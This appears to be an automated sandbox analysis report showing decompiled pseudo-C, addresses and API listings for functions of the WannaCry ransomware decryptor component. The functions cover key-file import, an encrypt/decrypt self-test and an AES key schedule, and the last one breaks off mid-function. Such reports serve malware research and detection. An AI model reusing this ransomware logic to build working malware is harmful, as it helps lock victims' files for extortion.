				_t92 =  *0x420c68; // 0x0
				_v544 = _t92;
				_v543 = 0;
				_v540 = 0;
				memset( &_v539, 0, 0x7f << 2);
				_t120 = _t118 - 0x21c + 0xc;
				asm("stosw");
				asm("stosb");
				asm("repne scasb");
				_v556 = 0xbadbac;
				if(E004046B0(_t63) == 0) {
					L6:
					 *[fs:0x0] = _v20;
					return 0;
				} else {
					_v8 = 0;
					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
					_t121 = _t120 + 0xc;
					if(_t45 == 0) {
						L12:
						_push(0xffffffff);
						_push( &_v20);
						goto L5;
					} else {
						_t76 = _a8;
						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
						_t121 = _t121 + 0xc;
						if(_t48 == 0) {
							goto L12;
						} else {
							asm("repne scasb");
							_t78 =  !(_t76 | 0xffffffff);
							_t116 =  &_v552 - _t78;
							_t79 = _t78 >> 2;
							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
							_t121 = _t121 + 0x18;
							_push(0x200);
							_push( &_v556);
							_push( &_v540);
							_push(0);
							_push(1);
							_push(0);
							_push( *((intOrPtr*)(_t63 + 8)));
							if( *0x4217cc() != 0) {
								_t85 =  *(_t63 + 0xc);
								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
									asm("repne scasb");
									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
										_v8 = 0xffffffff;
										E004049A6(_t63);
										goto L6;
									} else {
										_push(0xffffffff);
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L5;
								}
							} else {
								_push(0xffffffff);
								_push( &_v20);
								L5:
								L00413056();
								goto L6;
							}
						}
					}
				}
			}




























                                                      0x004047c3
                                                      0x004047c5
                                                      0x004047ca
                                                      0x004047d5
                                                      0x004047d6
                                                      0x004047e6
                                                      0x004047e8
                                                      0x004047ee
                                                      0x004047f3
                                                      0x004047f9
                                                      0x004047ff
                                                      0x00404805
                                                      0x0040480b
                                                      0x00404811
                                                      0x00404818
                                                      0x0040482c
                                                      0x0040482c
                                                      0x0040482e
                                                      0x00404830
                                                      0x0040483c
                                                      0x00404841
                                                      0x00404850
                                                      0x004048f3
                                                      0x004048f8
                                                      0x00404905
                                                      0x00404856
                                                      0x00404856
                                                      0x00404869
                                                      0x0040486e
                                                      0x00404873
                                                      0x00404995
                                                      0x00404995
                                                      0x0040499a
                                                      0x00000000
                                                      0x00404879
                                                      0x0040487c
                                                      0x00404885
                                                      0x0040488a
                                                      0x0040488f
                                                      0x00000000
                                                      0x00404895
                                                      0x004048a6
                                                      0x004048a8
                                                      0x004048ae
                                                      0x004048b2
                                                      0x004048bc
                                                      0x004048bc
                                                      0x004048be
                                                      0x004048c9
                                                      0x004048d0
                                                      0x004048d1
                                                      0x004048d3
                                                      0x004048d5
                                                      0x004048da
                                                      0x004048e3
                                                      0x0040491c
                                                      0x00404928
                                                      0x0040493d
                                                      0x0040495c
                                                      0x00404984
                                                      0x0040498b
                                                      0x00000000
                                                      0x0040495e
                                                      0x0040495e
                                                      0x00404963
                                                      0x00404964
                                                      0x00404974
                                                      0x00404981
                                                      0x00404981
                                                      0x0040492a
                                                      0x0040492a
                                                      0x0040492f
                                                      0x00000000
                                                      0x0040492f
                                                      0x004048e5
                                                      0x004048e5
                                                      0x004048ea
                                                      0x004048eb
                                                      0x004048eb
                                                      0x00000000
                                                      0x004048f0
                                                      0x004048e3
                                                      0x0040488f
                                                      0x00404873

                                                      APIs
                                                        • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E,00000001,?,0019FA30), ref: 004046CD
                                                        • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                        • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                        • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,00000200,?,?,?,00000001,?,0019FA30), ref: 004048DB
                                                      • _local_unwind2.MSVCRT ref: 004048EB
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,?,0019FA30), ref: 00404920
                                                      • strncmp.MSVCRT(00000000,?,?,?,?,?,00000001,?,0019FA30), ref: 00404951
                                                      • _local_unwind2.MSVCRT ref: 00404964
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                                      • String ID: TESTDATA
                                                      • API String ID: 154225373-1607903762
                                                      • Opcode ID: 9fc8fd852483a7773baa26bdbab2755cf9050b3d98a8213ca234863979ca94e3
                                                      • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                                      • Opcode Fuzzy Hash: 9fc8fd852483a7773baa26bdbab2755cf9050b3d98a8213ca234863979ca94e3
                                                      • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004049B0 Relevance: 10.6, APIs: 7, Instructions: 107fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
				int _v8;
				char _v20;
				long _v32;
				int _v36;
				long _v40;
				void* _v44;
				long _t24;
				int _t28;
				BYTE* _t35;
				void* _t46;
				long _t51;
				intOrPtr _t53;

				_push(0xffffffff);
				_push(0x415e48);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_v44 = 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t46;
				if(_t46 == 0xffffffff) {
					L10:
					_push(0xffffffff);
					goto L11;
				} else {
					_t24 = GetFileSize(_t46, 0);
					_t51 = _t24;
					_v40 = _t51;
					if(_t51 != 0xffffffff) {
						if(_t51 <= 0x19000) {
							_t35 = GlobalAlloc(0, _t51);
							_v36 = _t35;
							if(_t35 == 0) {
								goto L10;
							} else {
								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
									_push(0xffffffff);
									if(_t28 == 0) {
										L11:
										_push( &_v20);
										goto L12;
									} else {
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L12;
								}
							}
						} else {
							_push(0xffffffff);
							_push( &_v20);
							goto L12;
						}
					} else {
						_push(_t24);
						_push( &_v20);
						L12:
						L00413056();
						 *[fs:0x0] = _v20;
						return 0;
					}
				}
			}















                                                      0x004049b3
                                                      0x004049b5
                                                      0x004049ba
                                                      0x004049c5
                                                      0x004049c6
                                                      0x004049d3
                                                      0x004049dc
                                                      0x004049df
                                                      0x004049e2
                                                      0x004049fb
                                                      0x004049fd
                                                      0x00404a03
                                                      0x00404ac1
                                                      0x00404ac1
                                                      0x00000000
                                                      0x00404a09
                                                      0x00404a0b
                                                      0x00404a11
                                                      0x00404a13
                                                      0x00404a19
                                                      0x00404a2b
                                                      0x00404a40
                                                      0x00404a42
                                                      0x00404a47
                                                      0x00000000
                                                      0x00404a49
                                                      0x00404a5a
                                                      0x00404a75
                                                      0x00404a7d
                                                      0x00404a7f
                                                      0x00404ac3
                                                      0x00404ac6
                                                      0x00000000
                                                      0x00404a81
                                                      0x00404a84
                                                      0x00404a85
                                                      0x00404a95
                                                      0x00404aa2
                                                      0x00404aa2
                                                      0x00404a5c
                                                      0x00404a5c
                                                      0x00404a61
                                                      0x00000000
                                                      0x00404a61
                                                      0x00404a5a
                                                      0x00404a2d
                                                      0x00404a2d
                                                      0x00404a32
                                                      0x00000000
                                                      0x00404a32
                                                      0x00404a1b
                                                      0x00404a1b
                                                      0x00404a1f
                                                      0x00404ac7
                                                      0x00404ac7
                                                      0x00404ad4
                                                      0x00404ae1
                                                      0x00404ae1
                                                      0x00404a19

                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                      • _local_unwind2.MSVCRT ref: 00404AC7
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateSize_local_unwind2
                                                      • String ID:
                                                      • API String ID: 1039228802-0
                                                      • Opcode ID: ed254800d83dd1eb8a6aac6938c1a1a2985862e8f5bcc3d9dd4918768007605e
                                                      • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                                      • Opcode Fuzzy Hash: ed254800d83dd1eb8a6aac6938c1a1a2985862e8f5bcc3d9dd4918768007605e
                                                      • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A150 Relevance: 9.4, APIs: 6, Instructions: 375COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E0040A150(void* __ecx) {
				void* _t170;
				void* _t177;
				unsigned int _t178;
				intOrPtr _t182;
				signed int _t189;
				signed int _t190;
				signed int _t192;
				signed int* _t198;
				signed int* _t203;
				signed int _t214;
				signed int* _t215;
				signed int _t224;
				void* _t236;
				unsigned int _t238;
				signed int _t239;
				signed int _t245;
				signed int _t251;
				void* _t268;
				void* _t275;
				signed int _t276;
				void* _t278;
				signed int _t290;
				int _t292;
				signed int _t293;
				signed int _t317;
				signed int _t321;
				signed int _t337;
				signed int _t353;
				signed int _t355;
				intOrPtr* _t375;
				signed int _t378;
				void* _t385;
				void* _t386;
				void* _t387;
				signed int _t388;
				signed int* _t390;
				void* _t391;
				void* _t392;
				signed int _t395;
				signed int* _t397;
				intOrPtr _t398;
				void* _t399;
				void* _t403;

				_t236 = __ecx;
				if( *((intOrPtr*)(_t399 + 4)) == 0) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				_t170 =  *(_t399 + 0x20);
				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_t170 = _t399 + 8;
					_push(0x41c9c0);
					_push(_t170);
					L004130FC();
				}
				_t238 =  *(_t399 + 0x24);
				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
					_t238 = _t399 + 0xc;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				 *(_t236 + 0x3c8) = _t170;
				 *(_t236 + 0x3cc) = _t238;
				_t290 = _t238;
				_t385 =  *(_t399 + 0x20);
				_t19 = _t236 + 0x3d0; // 0x424
				_t239 = _t238 >> 2;
				memcpy(_t19, _t385, _t239 << 2);
				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
				_t22 = _t236 + 0x3f0; // 0x444
				_t245 =  *(_t236 + 0x3cc) >> 2;
				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
				_t403 = _t399 + 0x30;
				_t177 =  *(_t236 + 0x3c8);
				if(_t177 == 0x10) {
					_t178 =  *(_t236 + 0x3cc);
					if(_t178 != 0x10) {
						asm("sbb eax, eax");
						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
					} else {
						_t182 = 0xa;
					}
					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
				} else {
					if(_t177 == 0x18) {
						asm("sbb ecx, ecx");
						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
					} else {
						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
					}
				}
				asm("cdq");
				_t292 = 0;
				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
				 *(_t403 + 0x2c) = _t251;
				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
					L23:
					_t293 = 0;
					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
						L28:
						_t44 = _t236 + 0x414; // 0x468
						_t387 = _t44;
						asm("cdq");
						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
						 *(_t403 + 0x30) = _t353;
						_t189 =  *(_t403 + 0x24);
						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
						 *(_t403 + 0x10) = _t395;
						if(_t395 <= 0) {
							L31:
							_t388 = 0;
							if(_t395 <= 0) {
								L35:
								if(_t388 >= _t353) {
									L51:
									_t190 = 1;
									 *(_t403 + 0x30) = 1;
									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
										L58:
										 *((char*)(_t236 + 4)) = 1;
										return _t190;
									}
									_t151 = _t236 + 0x208; // 0x25c
									_t397 = _t151;
									do {
										if(_t251 <= 0) {
											goto L57;
										}
										_t390 = _t397;
										_t355 = _t251;
										do {
											_t192 =  *_t390;
											 *(_t403 + 0x24) = _t192;
											_t390 =  &(_t390[1]);
											_t355 = _t355 - 1;
											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
										} while (_t355 != 0);
										_t251 =  *(_t403 + 0x2c);
										L57:
										_t190 =  *(_t403 + 0x30) + 1;
										_t397 =  &(_t397[8]);
										 *(_t403 + 0x30) = _t190;
									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
									goto L58;
								}
								 *(_t403 + 0x28) = 0x41a1b0;
								do {
									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
									if(_t395 == 8) {
										_t104 = _t236 + 0x418; // 0x46c
										_t198 = _t104;
										_t268 = 3;
										do {
											 *_t198 =  *_t198 ^  *(_t198 - 4);
											_t198 =  &(_t198[1]);
											_t268 = _t268 - 1;
										} while (_t268 != 0);
										 *(_t403 + 0x24) =  *(_t236 + 0x420);
										_t275 = 3;
										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
										_t116 = _t236 + 0x428; // 0x47c
										_t203 = _t116;
										do {
											 *_t203 =  *_t203 ^  *(_t203 - 4);
											_t203 =  &(_t203[1]);
											_t275 = _t275 - 1;
										} while (_t275 != 0);
										L46:
										 *(_t403 + 0x24) = 0;
										if(_t395 <= 0) {
											goto L50;
										}
										_t119 = _t236 + 0x414; // 0x468
										_t375 = _t119;
										while(1) {
											_t251 =  *(_t403 + 0x2c);
											if(_t388 >=  *(_t403 + 0x30)) {
												goto L51;
											}
											_t398 =  *_t375;
											asm("cdq");
											_t375 = _t375 + 4;
											_t276 = _t388 / _t251;
											asm("cdq");
											_t317 = _t388 %  *(_t403 + 0x2c);
											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
											_t395 =  *(_t403 + 0x10);
											_t214 =  *(_t403 + 0x24) + 1;
											_t388 = _t388 + 1;
											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
											 *(_t403 + 0x24) = _t214;
											if(_t214 < _t395) {
												continue;
											}
											goto L50;
										}
										goto L51;
									}
									if(_t395 <= 1) {
										goto L46;
									}
									_t101 = _t236 + 0x418; // 0x46c
									_t215 = _t101;
									_t278 = _t395 - 1;
									do {
										 *_t215 =  *_t215 ^  *(_t215 - 4);
										_t215 =  &(_t215[1]);
										_t278 = _t278 - 1;
									} while (_t278 != 0);
									goto L46;
									L50:
									_t251 =  *(_t403 + 0x2c);
								} while (_t388 <  *(_t403 + 0x30));
								goto L51;
							}
							_t58 = _t236 + 0x414; // 0x468
							 *(_t403 + 0x24) = _t58;
							while(_t388 < _t353) {
								asm("cdq");
								_t378 = _t388 / _t251;
								asm("cdq");
								_t321 = _t388 % _t251;
								 *(_t403 + 0x28) = _t321;
								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
								_t388 = _t388 + 1;
								_t224 =  *(_t403 + 0x24);
								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
								_t353 =  *(_t403 + 0x30);
								 *(_t403 + 0x24) = _t224 + 4;
								if(_t388 < _t395) {
									continue;
								}
								goto L35;
							}
							goto L51;
						}
						 *(_t403 + 0x24) = _t395;
						do {
							_t387 = _t387 + 4;
							 *(_t387 - 4) = 0 << 0x18;
							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
							_t189 = _t189 + 4;
							_t337 =  *(_t403 + 0x24) - 1;
							 *(_t403 + 0x24) = _t337;
						} while (_t337 != 0);
						goto L31;
					}
					_t38 = _t236 + 0x1e8; // 0x23c
					_t391 = _t38;
					do {
						if(_t251 > 0) {
							memset(_t391, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t293 = _t293 + 1;
						_t391 = _t391 + 0x20;
					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L28;
				} else {
					_t33 = _t236 + 8; // 0x5c
					_t392 = _t33;
					do {
						if(_t251 > 0) {
							memset(_t392, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t292 = _t292 + 1;
						_t392 = _t392 + 0x20;
					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L23;
				}
			}














































                                                      0x0040a15a
                                                      0x0040a15c
                                                      0x0040a167
                                                      0x0040a16f
                                                      0x0040a179
                                                      0x0040a17e
                                                      0x0040a17f
                                                      0x0040a17f
                                                      0x0040a184
                                                      0x0040a18b
                                                      0x0040a1a0
                                                      0x0040a1a8
                                                      0x0040a1ae
                                                      0x0040a1b2
                                                      0x0040a1b7
                                                      0x0040a1b8
                                                      0x0040a1b8
                                                      0x0040a1bd
                                                      0x0040a1c4
                                                      0x0040a1d4
                                                      0x0040a1dd
                                                      0x0040a1e1
                                                      0x0040a1eb
                                                      0x0040a1f0
                                                      0x0040a1f1
                                                      0x0040a1f1
                                                      0x0040a1f7
                                                      0x0040a201
                                                      0x0040a208
                                                      0x0040a20b
                                                      0x0040a20d
                                                      0x0040a213
                                                      0x0040a216
                                                      0x0040a225
                                                      0x0040a229
                                                      0x0040a22f
                                                      0x0040a239
                                                      0x0040a239
                                                      0x0040a23b
                                                      0x0040a244
                                                      0x0040a272
                                                      0x0040a27b
                                                      0x0040a289
                                                      0x0040a28e
                                                      0x0040a27d
                                                      0x0040a27d
                                                      0x0040a27d
                                                      0x0040a291
                                                      0x0040a246
                                                      0x0040a249
                                                      0x0040a262
                                                      0x0040a26a
                                                      0x0040a24b
                                                      0x0040a24b
                                                      0x0040a24b
                                                      0x0040a249
                                                      0x0040a29d
                                                      0x0040a2a3
                                                      0x0040a2ad
                                                      0x0040a2b2
                                                      0x0040a2b6
                                                      0x0040a2d7
                                                      0x0040a2dd
                                                      0x0040a2e1
                                                      0x0040a305
                                                      0x0040a312
                                                      0x0040a312
                                                      0x0040a318
                                                      0x0040a319
                                                      0x0040a31f
                                                      0x0040a327
                                                      0x0040a32b
                                                      0x0040a330
                                                      0x0040a334
                                                      0x0040a36e
                                                      0x0040a36e
                                                      0x0040a372
                                                      0x0040a3cf
                                                      0x0040a3d1
                                                      0x0040a576
                                                      0x0040a57c
                                                      0x0040a583
                                                      0x0040a587
                                                      0x0040a5f3
                                                      0x0040a5f5
                                                      0x0040a5fe
                                                      0x0040a5fe
                                                      0x0040a589
                                                      0x0040a589
                                                      0x0040a58f
                                                      0x0040a591
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a593
                                                      0x0040a595
                                                      0x0040a597
                                                      0x0040a597
                                                      0x0040a59b
                                                      0x0040a5a5
                                                      0x0040a5d3
                                                      0x0040a5d4
                                                      0x0040a5d4
                                                      0x0040a5d9
                                                      0x0040a5dd
                                                      0x0040a5e7
                                                      0x0040a5e8
                                                      0x0040a5ed
                                                      0x0040a5ed
                                                      0x00000000
                                                      0x0040a58f
                                                      0x0040a3d7
                                                      0x0040a3df
                                                      0x0040a3e8
                                                      0x0040a446
                                                      0x0040a44c
                                                      0x0040a450
                                                      0x0040a478
                                                      0x0040a478
                                                      0x0040a47e
                                                      0x0040a483
                                                      0x0040a48a
                                                      0x0040a48c
                                                      0x0040a48f
                                                      0x0040a48f
                                                      0x0040a49a
                                                      0x0040a4e0
                                                      0x0040a4ec
                                                      0x0040a4f2
                                                      0x0040a4f2
                                                      0x0040a4f8
                                                      0x0040a4ff
                                                      0x0040a501
                                                      0x0040a504
                                                      0x0040a504
                                                      0x0040a507
                                                      0x0040a509
                                                      0x0040a511
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a513
                                                      0x0040a513
                                                      0x0040a519
                                                      0x0040a51d
                                                      0x0040a523
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a527
                                                      0x0040a529
                                                      0x0040a52c
                                                      0x0040a52f
                                                      0x0040a533
                                                      0x0040a534
                                                      0x0040a53b
                                                      0x0040a545
                                                      0x0040a555
                                                      0x0040a556
                                                      0x0040a559
                                                      0x0040a560
                                                      0x0040a564
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a564
                                                      0x00000000
                                                      0x0040a519
                                                      0x0040a455
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a45b
                                                      0x0040a45b
                                                      0x0040a461
                                                      0x0040a464
                                                      0x0040a46b
                                                      0x0040a46d
                                                      0x0040a470
                                                      0x0040a470
                                                      0x00000000
                                                      0x0040a566
                                                      0x0040a56a
                                                      0x0040a56e
                                                      0x00000000
                                                      0x0040a3df
                                                      0x0040a374
                                                      0x0040a37a
                                                      0x0040a37e
                                                      0x0040a388
                                                      0x0040a38b
                                                      0x0040a38f
                                                      0x0040a390
                                                      0x0040a392
                                                      0x0040a39f
                                                      0x0040a3af
                                                      0x0040a3b3
                                                      0x0040a3bc
                                                      0x0040a3c3
                                                      0x0040a3c9
                                                      0x0040a3cd
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a3cd
                                                      0x00000000
                                                      0x0040a37e
                                                      0x0040a336
                                                      0x0040a33a
                                                      0x0040a33c
                                                      0x0040a344
                                                      0x0040a34f
                                                      0x0040a366
                                                      0x0040a367
                                                      0x0040a368
                                                      0x0040a368
                                                      0x00000000
                                                      0x0040a33a
                                                      0x0040a2e3
                                                      0x0040a2e3
                                                      0x0040a2e9
                                                      0x0040a2eb
                                                      0x0040a2f1
                                                      0x0040a2f1
                                                      0x0040a2f3
                                                      0x0040a2f3
                                                      0x0040a2fd
                                                      0x0040a2fe
                                                      0x0040a301
                                                      0x00000000
                                                      0x0040a2b8
                                                      0x0040a2b8
                                                      0x0040a2b8
                                                      0x0040a2bb
                                                      0x0040a2bd
                                                      0x0040a2c3
                                                      0x0040a2c3
                                                      0x0040a2c5
                                                      0x0040a2c5
                                                      0x0040a2cf
                                                      0x0040a2d0
                                                      0x0040a2d3
                                                      0x00000000
                                                      0x0040a2bb

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 787a0e5b380b31d4d9763920ba09c97f48b514d7692f2e30947326bafaad1703
                                                      • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                                      • Opcode Fuzzy Hash: 787a0e5b380b31d4d9763920ba09c97f48b514d7692f2e30947326bafaad1703
                                                      • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D300 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
				void _v1024;
				char _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				void* _v1040;
				intOrPtr _v1044;
				char _v1048;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				void* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t49;
				signed int _t58;
				intOrPtr* _t60;
				signed int _t70;
				signed int _t71;
				signed int _t78;
				void* _t83;
				void* _t91;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void** _t107;
				void** _t109;

				_t106 =  &_v1040;
				_t105 = _a8;
				_t60 = __ecx;
				_v1032 = 0;
				if(_t105 != 0) {
					_t34 = E0040D5D0(__ecx);
					__eflags = _t34;
					if(_t34 != 0) {
						__eflags = _a12;
						if(_a12 == 0) {
							_t36 = _a4;
							_v1040 = _t36;
							_t91 = _t36;
							goto L13;
						} else {
							__eflags = _a16;
							if(_a16 != 0) {
								__eflags = _t105 - 0x400;
								if(_t105 > 0x400) {
									_t49 = E00412A90(_t105);
									_t109 =  &(( &_v1040)[1]);
									_v1040 = _t49;
									__eflags = _t49;
									if(_t49 != 0) {
										_t103 = _a4;
										_t70 = _t105;
										_t71 = _t70 >> 2;
										memcpy(_t49, _t103, _t71 << 2);
										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
										_t106 =  &(_t109[6]);
										_t91 = _v1040;
										E0040D2B0(_t60, _t91, _t105);
										goto L13;
									} else {
										return _t49;
									}
								} else {
